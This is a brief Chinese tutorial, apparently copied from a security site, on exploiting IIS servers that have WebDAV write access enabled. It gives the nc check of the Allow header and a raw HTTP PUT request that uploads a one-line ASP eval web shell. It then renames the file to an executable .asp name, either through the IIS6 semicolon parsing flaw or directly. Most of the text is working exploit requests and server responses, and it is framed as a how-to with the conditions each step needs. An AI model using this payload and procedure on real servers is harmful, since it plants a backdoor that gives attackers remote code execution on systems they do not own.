参考: http://HdhCmsTest2cto测试数据/Article/201307/228165.html
利用工具 nc
第一步:判断
返回
HTTP/1.1 200 OK
Date: Tue, 03 Sep 2013 03:11:32 GMT
MS-Author-Via: DAV
Accept-Ranges: none
DASL: <DAV:sql>
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
当ALLOW中包含如上方法时,可以确定服务器开启了WebDAV。
第二步:
此时可以用PUT上传文件,但是不可以直接上传可执行脚本文件,可以先上传一个其他类型的文件。
PUT /test.txt HTTP/1.1
Host:192.168.56.101
Content-Length:23
<%eval request("a")%>
返回
HTTP/1.1 201 Created
Date: Tue, 03 Sep 2013 03:19:11 GMT
Location: http://192.168.56.101/test.txt
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
说明test.txt创建成功了。
这步需要条件:启用了[WebDAV]扩展,并且复选了[写入],就可以写入txt文件了
第三步:
1、利用iis6解析 漏洞 ,把文件move 成 test. asp ;.jpg
Destination:http://192.168.56.101/test.asp;.jpg
需要条件:存在iis6解析漏洞
2、直接move 成test.asp
Destination:http://192.168.56.101/test.asp
需要条件:复选上[脚本资源访问]
查看更多关于IIS WEBDAV安全配置问题利用 - 网站安全 - 自学php的详细内容...